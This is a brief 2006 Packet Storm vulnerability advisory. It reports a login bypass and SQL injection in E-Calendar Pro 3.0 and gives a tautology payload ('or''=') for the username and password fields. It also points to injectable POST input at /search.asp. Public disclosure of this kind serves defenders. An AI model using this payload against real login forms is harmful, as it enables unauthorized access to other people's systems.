ecalpro30.txt

2006-11-16T00:00:00
ID PACKETSTORM:52173
Type packetstorm
Reporter benjamin moss
Modified 2006-11-16T00:00:00

Description

                                        
                                            `vendor site:http://www.futuretec-soft.com/  
product:E-Calendar Pro 3.0   
bug:login bypass & injection sql post  
risk:high  
  
  
login bypass :  
username: 'or''='  
passwd: 'or''='  
  
injection sql post:  
in : /search.asp  
post your query into the search engine .  
  
  
  
  
laurent gaffié & benjamin mossé  
http://s-a-p.ca/  
contact: saps.audit@gmail.com  
`